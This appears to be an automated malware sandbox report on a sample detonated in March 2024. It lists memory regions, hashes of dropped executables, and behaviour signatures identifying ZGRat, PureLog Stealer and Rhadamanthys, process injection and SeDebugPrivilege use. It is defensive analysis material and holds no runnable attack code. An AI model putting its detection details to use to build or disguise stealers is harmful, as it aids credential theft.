memory/1148-56-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-58-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-60-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-62-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-64-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-66-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-68-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-70-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-72-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-74-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-76-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-78-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-80-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-84-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-87-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-91-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-93-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-89-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-97-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-95-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-99-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-101-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-105-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-107-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1148-103-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/1988-85-0x0000000000400000-0x0000000000667000-memory.dmp

memory/1148-82-0x00000000049A0000-0x0000000004BA3000-memory.dmp

memory/2880-363-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1988-650-0x0000000010000000-0x000000001002F000-memory.dmp

memory/1988-812-0x0000000000320000-0x0000000000321000-memory.dmp

memory/1148-995-0x0000000001F70000-0x0000000001FB0000-memory.dmp

memory/1148-996-0x0000000000300000-0x0000000000301000-memory.dmp

memory/1148-997-0x0000000004EF0000-0x0000000005090000-memory.dmp

memory/1148-998-0x00000000047D0000-0x000000000481C000-memory.dmp

\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 71eb1bc6e6da380c1cb552d78b391b2a
SHA1 df3278e6e26d8c0bc878fe0a8c8a91b28c5a652d
SHA256 cefa92ee6cc2fad86c49dd37d57ff8afcb9b9abef0a110689e6d771394256bd6
SHA512 d6fab2c469924b8202f7964e864f66d6b6151937c8d134fb40e1f1d3787cf22328892c3f7209786e0b42e1abd5ca71a61f40538ef1e93534d2a98bf6d4448e90

memory/1612-1007-0x0000000074430000-0x0000000074B1E000-memory.dmp

memory/1612-1006-0x0000000000130000-0x0000000000270000-memory.dmp

memory/1612-1009-0x00000000022D0000-0x0000000002310000-memory.dmp

memory/1148-1008-0x0000000074430000-0x0000000074B1E000-memory.dmp

memory/1612-1010-0x0000000004C70000-0x0000000004D98000-memory.dmp

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 2a86f6ec50089c5e50a07dcd113ff65b
SHA1 6e419db1a719a214164ec46d58b5aac4ea9f4ada
SHA256 a502e3afa1a6207c43789ce9b866012041be2241c0c26feeded4ef82bb5eade4
SHA512 e088d2bd5a5fb6b3f681e37fe68c386f704001fe0b6c8f5dbe25b14cf833d1c27ce0c18a4ad4aed7313b4b8444436fd6a71b6510688920f081fb7f287a2fd1eb

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 3d9ff8a504031fbbd2d866828ee7a642
SHA1 bd70d5e1e4e983ab855c19cc5021a193e0f43922
SHA256 82774139d6d23804accfc50c556856d472a79811deae8ffd52f0feb65bfeec9e
SHA512 43404ddd65207b94b80d27b0de35d5a17f7dec268567036f850b106543ef0993c57160e719ef0d9da9682dfc5b05f5dcd4a51751c588136ebead1efd6609f29a

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 d2c8ab0106d33d9a0b1fd939198f4224
SHA1 53ef0dbc5735486a5b8288a16e77fb71a967ba8c
SHA256 1a0a89b5faf16dac66cf7f64767b41cb6d41bea97b37b8c56b17d79da99390c9
SHA512 e5707b62186cd62c45951005681065ac87a62fb1400693205e5639dc7f453a09b8b85422320dfa697c36447d8a7b74e812443800bf0c84f038ae42709fdd68c0

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 2b41b95af46b68453332f2a18119c087
SHA1 342b41f904d868f88bfb10cff44079ec67039b15
SHA256 1f0196686bc4c083e0aad18182707e6e77ac75f566037e586c8fe5aa974eafea
SHA512 24a16927e93b45b4af7aec10f9b0aaccbadbc152c0a9cc7000c05164691794bbba870669a96b95827c36f382ee0a5a652b492538bbd33a66eefa46227b0e0732

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 305145814473e0c4e5c7f29ccdca213a
SHA1 8579674138f71bbe2339801db6966263d7bac518
SHA256 e431cea88bd0ba9b80cb47e2705148e473b1076296e501a3d873db7b3a150da7
SHA512 0f759a1f8824143489f44c300999db31b576572e28f77b4c8f3589a88717df3e53908d330c932fcb8e3c4264f3912baa1302b29231447365c3f136f3d8761aee

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 901647add3d61eabca6f4ccd981cd457
SHA1 923f4be54c26ff574d5d737d118655e53821c0ba
SHA256 2b1d616e3c1944126c18bcdf81bca6a65f15bc8cd654b106408c5d34cdb719b7
SHA512 ae733fa86116c9781586266bc5513b1b32f85f5262c29d4b9fedc4af668e1a6afcff5fe32b7faf7a554fc8b58c71b0e2104fdac7fb0ae3568838cd81e630261b

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 bf5e6f7ad139d9b44c959fab6126ae48
SHA1 b511e899b4f47577b11286b6e134dbe0a5659147
SHA256 12bf6f4e44962ea92999c3fcc6751b2f0f8d163be9ae7b290cfba8d7dee432e3
SHA512 f0c4f5c6984d14ee60913c2784cf9ccd7904a254b46f7bca67aa3eb349dfd5956900e66c80dbae1e084b71ae7555d9a7ac56b2d42801c7a990f368daa78fba81

memory/1148-1032-0x0000000074430000-0x0000000074B1E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 7cb9f2b9fc46e1d7c81aacf1918b635e
SHA1 63820b7c3e92e2c3622f95c7246f2405e5a1ec8f
SHA256 6aef22390f556ce1c6e57e3a482a07c925c85d2fd26969090b06a3ae647bd6a0
SHA512 aa5e3d485113b046306ad59815d51bc2046f655b02becd7254964c4bd7c3b558e33cdee01b1cd9405ac9db8663641a4c630a347268d7aecd3778d282ed08bcc4

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 9f99821463ee96b48d882e7fe44f30c2
SHA1 02dcbe14da05fd90342149b2bef2f93cc1073b40
SHA256 b58c672da752eb3a20a1bbc2f8b3ba71884998c241cae72da7bb1872a679085c
SHA512 283ff20a7fe1a74a331c9c3acfbdbf4061858bed17d7d1279a3819b75d45965e4c1b52775ac98ebc6f45ae40ddaf3244235a8bb61c2be2618fd512aa86f25180

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 21d13f88cf023762c741bbb8e3d5e0f1
SHA1 2d679ab260b243e5a6d49422fe4406c5eac81f3c
SHA256 c7ee4abe275207aa56e8a519fc92af8c8cbb3b452b7adc2b8aacf20e5587fce2
SHA512 bfd53d113d5799248adde1beba931cf7bbea5e760f26eb9fd17c4b9d48a8283b9f969cc0b9bdcfd3126cd5da650515d3e117eaea666c1ee2f13dabcf5fd408f2

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 77a9af8a6f2aa1d2e088ddc9e4744898
SHA1 756bdbae22fe5efb2d5ce857f6b9e350875270ee
SHA256 d67b926f192cab5e8defb5ff22bbf79e3db1461b891c8644cd4e1442c577026d
SHA512 14dfd6adecf9b9d4f88a15f15cc52c62f9ee2f75d3d494f91061064c9cf543c164083528f211e8a2c273c94386cc5892c051eee64bb88e72700e7e5cb368d7ce

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 c84b71ce414bcbcc310ac6ed6316cf19
SHA1 3272c21fd9948783694627f05ce65a8cdfa793b2
SHA256 e0c20b2b6bb4248c295c2c518a7e0efd502850cd5794b6d19f1f070342f378fe
SHA512 ba31cb0046617ef884337b4e57f322f2ad834725762e13f8ce0ba2f89182ca539dcb00d6ce94c301e510768787844142e5375198cd42f6e951179e86f35ee6ed

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 d470c5acd68b7528856836ae90a3b395
SHA1 a3aa63951f1e70cc1a3b2fa36b9373de194244da
SHA256 23d6df0dd3cab83fd927d6602c5ffdd3b87f3e0ed03d386b2d9eb255c54d131e
SHA512 46d0494169c56952caad58cd63c9e2064fea60e9ec4ae85a93acc73152690114eab51f65c5b7ad1bb203452e59fbd22e7a5ee2fd6c331ca24a88052f85fe648e

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 c57b4de6823f4782aaffe1739af664e5
SHA1 a5bdd27957394b06ed5739c7cfcc4e513a3f36c0
SHA256 c13dd20cddbff666755cd9fe5e8073c2d97889393d29c0a9b97a010f2828f068
SHA512 e6e9a70cef18f516e0a3cdd5f64d928c1e248811c6d1be515e073ddc27fc0c57df96f7575089b9d44c534a98cc30970fd8c1303e65c6b5561c711415163a57f3

memory/1612-1016-0x0000000004DA0000-0x0000000004ECA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 56bac36092872b5f22da31df51937a45
SHA1 fc3f340694ff92560bfd4dc1f71f7a405d29ad89
SHA256 8637f7717ca9131a408987ca277555edf2b6fdc890f769e892d77300a7f623e9
SHA512 c1910d8c806306cc36c735e97c495a3f0e8b591c4e0b48eac7ca7c273a7ddfa6d7439a9112a17c19727e95dda0d7cc2b5e7869b17e43d69c3c9572b985a697db

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 16e2a532137be4ad240133f4aa246c32
SHA1 ed2342853ae2b4cd5303ee56037501a2d89b515e
SHA256 d30845a4bc7a48cfbdfe6d977c3deac99f5d5f59f6a7c688999676e10608f960
SHA512 6c0c4c6495da845496e7ed5783fe199a721ebedc75504d7afc08bb0bfc2797e77331eddd79e2a727a87457b6000f4776cf1c467c32d895908c0eae7c46a2224e

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 715b62e332a0b52b690bb724d56a43cc
SHA1 0855176779c6d75642d64edc682ca8b11756410f
SHA256 751be823130da932b588761b596984f8a896b0c88da34981945a2d0de8f1ec96
SHA512 6dc536b007d12790de713f5eb71d3d29ad395f9bbb8b3ae1452f699e030fac7476752cb0469d846cda0893e5beb615d423ff8e6f4aa0bb8e3b8691610dc77eb5

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 e3037f3e2b965b491948505ea85c3b65
SHA1 ad6272397cb611bae7141363d050f91d47b99b97
SHA256 e54c79f902772f59681cadbd5115fe5a6e753eadcaeaa3b69d6dc3bb84a4129b
SHA512 74fba3e9dd6bd73f54b1fa691713235188d4c69961122eedfae0bd1b12cb401978017bc68516924525267ead97b2794f2f6d2ced4a3ef46ef2b41665a1c6de5a

\Users\Admin\AppData\Local\Temp\Dropakxa.exe

MD5 befdec4920dc463a48214a64e3a3fc57
SHA1 3f2f468d3199e61aeb9805179fee3bf3e69b40e0
SHA256 670bed58b303646141f7c6de74e2651293494182335d421a02b40fa33ea66780
SHA512 e989f5eee83e2e2818620451431aa21b598ef666b71be1f3b01fedf904c1fe5d700cdb003b4a89b348412ed2263f76387b884b63c1428eea04047b11e8e2b370

memory/1612-1968-0x0000000000390000-0x0000000000391000-memory.dmp

memory/1612-1969-0x0000000005250000-0x0000000005310000-memory.dmp

\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 c43f9e71adc553cfd066fff8faa951fc
SHA1 b42ed3117d59c78a9aae1f3808239c8396478cd7
SHA256 067522f8c4d0832c9c7495fb46638aa41e0387994284fab89e0ac6885f6a76a8
SHA512 d1822bc87a5bbbd34e2c374cd4eb384f5b965671215e6e70a6f59b07b5fcacbcfcfcd678d8894ffe818861a6694a32b9414d57d45143a5a6908431b77f4b2748

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 2738e6311dfb65c10746a7e823f9c420
SHA1 dff9f71a4ec25e8bb172629618416bc404a4cd49
SHA256 0da7fc29b321a65e7244308f99d4370a67a81c2b9407aedbee4e5a97cfde44e3
SHA512 70dbcbdecfe67d2507b09b30906a8760abdf69588287543e8251022347d98697dd051bae0c82dc2918d20f11d508e7b7273ffc68e2661d72ccb47194246d5a60

memory/1612-1980-0x0000000074430000-0x0000000074B1E000-memory.dmp

memory/1756-1985-0x00000000743B0000-0x0000000074A9E000-memory.dmp

memory/1756-1984-0x0000000000400000-0x000000000049C000-memory.dmp

memory/1756-1987-0x00000000049A0000-0x00000000049E0000-memory.dmp

memory/1756-1986-0x0000000004870000-0x0000000004958000-memory.dmp

memory/1756-3273-0x00000000743B0000-0x0000000074A9E000-memory.dmp

memory/1756-3609-0x00000000049A0000-0x00000000049E0000-memory.dmp

memory/1756-4196-0x0000000004320000-0x0000000004376000-memory.dmp

memory/1756-4198-0x0000000004450000-0x00000000044A4000-memory.dmp

memory/1756-4200-0x00000000743B0000-0x0000000074A9E000-memory.dmp

memory/2664-4205-0x0000000019E50000-0x000000001A132000-memory.dmp

memory/2664-4206-0x0000000000E70000-0x0000000000E78000-memory.dmp

memory/2664-4207-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/2664-4210-0x0000000000F50000-0x0000000000FD0000-memory.dmp

memory/2664-4211-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/2664-4212-0x0000000000F50000-0x0000000000FD0000-memory.dmp

memory/2664-4214-0x0000000000F50000-0x0000000000FD0000-memory.dmp

memory/2664-4215-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 ad7af059b52c2a4f24bffd563b27bcb3
SHA1 ce0d642c692f1c23c838c5d4232c9d2261bf5e1c
SHA256 0bc77bf0a4624a031179c2e502e650f3533e1c62cfdc3f555210317322c98d64
SHA512 75a9c7f3b87405d1d56e5c1a81dd8b20394bfb5a50af15c685f63a5651c6607f8152841453ef1403a8b26c3fd8f14de80ab20d3fb261e7655476d3d8cc56acd9

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 6a84fb8031a6073d6f4d9f3dac12f277
SHA1 19a5b6e4a107857da24779d92f446729f02825f0
SHA256 f2633b79deed5997488498e8d3ba0bc51a4eb3a3afcc05d431b15870b1d1cf0e
SHA512 b075312ad68787dfe670a7cee5323d8512f99fc3af6f3dd53f2ba9856a0f133681ed605c81da1a87bc58432c7d9db0a225342b091158c9cd0c1eeabbeb26e1e5

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 eb204f6dab7cf388aaab7888ee65d05f
SHA1 db6939b8790fa8bd6389d0677372ac1ca9cf7ce2
SHA256 751bc8e153fb220c1f91fb9fbe128cc6e5818b06468f766c75a7154acbb0f37e
SHA512 57ae37eb1bfc9ef21fbce4568957ddc22988d90d610b9dcb1d0a53e4c35a838119f1ec750cac3a943bf5e58955c223d0a244362e8cf92e9a9fb039d78170077f

memory/2092-4227-0x0000000001210000-0x0000000001438000-memory.dmp

memory/2092-4226-0x00000000743E0000-0x0000000074ACE000-memory.dmp

memory/2092-5167-0x0000000000200000-0x0000000000201000-memory.dmp

memory/2092-5166-0x0000000000D50000-0x0000000000D90000-memory.dmp

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 c017ac6363e7d39abbecf8347cd479fd
SHA1 30cd34b1a7d5e981b6f5653cf478999aa76b7792
SHA256 0a04e77d164bf3eb3c96910b0e5b6bc6709d79fa0065a1a7dd9bbbfb414a2fb5
SHA512 35253cb41f963b6d1d5f151677d5e62bc2f34f789e56b8730b9fb90fa6384f7c850bd5127113090a863084f8a90de6c824033323fbcd52fe6dcb8734d41dc602

memory/2092-5184-0x00000000743E0000-0x0000000074ACE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 d2a7797f65d6b62f3713eddcaf73750c
SHA1 20f0368240a9f8efd5f0445a2c7f325539b2b32f
SHA256 096d84ea8e861cbf3b62f9f6761a1d0cb166fda236c296449a9a4cd67da8eab2
SHA512 70aa5e1d1aff6f0354c90e03e45d16764c444d0a4b7b4ee3e559ba782be01811030c76b85c53121002fc6c8aacfc1f9bef44e2c7b12f0cffdaff545708766e04

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 e61fe70d671ca6e00aa25f8b815fad9d
SHA1 2b468f1cb1fb761fc97fadcf40fe20da4507f44e
SHA256 775d577ee31ec9dc960bae075095e86f4f27c843e8cf55ad7cdce1d67d554f88
SHA512 a42bf88b9ba7dcd096582d0e81d6edb724c56388074e6f4f02c72b78f5eac2e910a28f407c232d8fe84dbfd7fe6dbb99df21d7996f2fea8c7071296c8808d7f9

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 bf61f338cc128a606e19a45341002853
SHA1 a34b4b29d7d486b846b862ff90ce8154e2cce612
SHA256 d5a856e0f918694ab607ae59f12a06bb2451a43747a38fad3cd8683b1f844a08
SHA512 76d37bdfff437211bfe9b3f85d24dab44bb8775aa50abaf40a24c279f8ade4e09e49abec4c0d0d789b2b5d576b29bd806bcf6a3c5db64b8a00f4f650c687db02

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 7aa0db0511abc4d54de27b5ee07934dd
SHA1 04ed31bae856de6b79b2e0fb9d4cb18a5ef30d74
SHA256 a39f715893992c0370a7196ab0f78e090c27785ea83ff4fa31288edba32e0c36
SHA512 78ca8b8f41c2495b13f837696ffd5c719177db7e19ef4c8b373c6c1ba206eac847c173420add7e31ab9e73114db087ef74b3fa0029438459e22d7405ba90ec58

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 c6afb0c004d21f8fdc5466e5b9570246
SHA1 da3585ad7f8b9b48c1b4936257881f9dd307d52a
SHA256 ebdbf9249394834c3ea133f8cbfc144a59e427f60c99317cba9ac73d58eb941d
SHA512 99e7804b085a459c9570174f8af4fc0cb71749422c111380ca0a77f195ea19fd6dd6c6901bd1a9e68b2d74e3478e63c19bfec63c0a53674d82acd946c84dbc37

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 8185a69623e729994f4919d4559d4f25
SHA1 89645e506f85348f56b9efe2b328a2cb79080846
SHA256 c9f8af665c4d958cd778d72013e667ae8c92312776e7a1795c80ca3822ed1ab0
SHA512 ccd921fbf5f689fb56c3ad257160a7910d2484629ae9c9241097156142bec3d0bec0bca25c770a5bc2fda02c55af099e3429d2e41f2b32480f8331f2c386acee

\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 b7a65e28d323e7ccc6727daafae7fede
SHA1 524e1b10ef8b50e16413a9feb90ca3aa2196c06c
SHA256 e9a73f79b31c109d68ccd29d78589676265f9c0b1fccb18f784f43b1efa36767
SHA512 7ec76f0e181841fdfa001179e4160ad713072a787557f8d194dde9b7f8066c50069e5400d2fce6c39bb9f383396b9fe755409bb8f3640a77d106d88cf5aecd71

C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe

MD5 b0ff12175629c451084af8d40925bab0
SHA1 adbc6f27fe0094fd2f7788080e817f4cd2cebce8
SHA256 8c7089f8b1dc687eb609a76ac6bebf67b3d90168604ea624ddc8c206b19f91c0
SHA512 60efb4c9c1c0e4310252392de96dc8762d9e5529ba5e292b98aef7f207e2c4f58b67cb7819060828967a02ffdf352ee624b65e40d807ba5e4cdcfe6498430b62

C:\Users\Admin\AppData\Local\TypeId\oubfbwcxu\AttributeString.exe

MD5 926982c446e011078d140355fb07f929
SHA1 21615be164d751111bcce74a1e3029e8a830979a
SHA256 66746a1531182809a7ae7c514b5858840548a715847aca6d5bef0de05dc606d0
SHA512 32ce88d80e2a5574f2317f894c2e64128b043be80c7a9580eaf0a0bf229d6390b7ebde3dc0c64fc9a11c9ac6834aea73a50fb87dae3d59f1a0d11e22cac0ec13

memory/1204-5194-0x0000000000C90000-0x0000000000DD0000-memory.dmp

memory/1204-5195-0x0000000073A20000-0x000000007410E000-memory.dmp

memory/1204-5196-0x0000000000C20000-0x0000000000C60000-memory.dmp

memory/1204-6132-0x0000000000260000-0x0000000000261000-memory.dmp

memory/1204-6147-0x0000000073A20000-0x000000007410E000-memory.dmp

memory/612-6148-0x0000000000400000-0x000000000049C000-memory.dmp

memory/612-6149-0x0000000073A20000-0x000000007410E000-memory.dmp

memory/612-6150-0x00000000004F0000-0x0000000000530000-memory.dmp

memory/612-7097-0x0000000073A20000-0x000000007410E000-memory.dmp

memory/612-7268-0x00000000004F0000-0x0000000000530000-memory.dmp

memory/612-8359-0x0000000004DF0000-0x0000000004E44000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a7794532b8bc992e4524df357873026e
SHA1 ce0898e1e07ac2afbbdf0728935283d780a43723
SHA256 6191e7e154da4491e85dceca26db9d2b4c9cca88180dea4c71b568a8900ed36c
SHA512 27eed2b3ee31f2762915ce6772a3e9bdc3ac552cf5296b23f21ec8752b8727824465d01dad6c6f244348632ffedb01b4825aeddf6b9e64326078e2c913bda912

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-11 15:48

Reported

2024-03-11 15:51

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

152s

Command Line

sihost.exe

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

PureLog Stealer

stealer purelogstealer

PureLog Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1784 created 2660 N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe C:\Windows\system32\sihost.exe
PID 1452 created 2660 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Windows\system32\sihost.exe

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\vctuacx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vctuacx.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TypeId\dylawcqb\AttributeString.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4800 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 4800 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 4800 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\vctuacx.exe
PID 4800 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe C:\Users\Admin\AppData\Local\Temp\c0facaa9561e361afe9d92d38e2793a0.exe
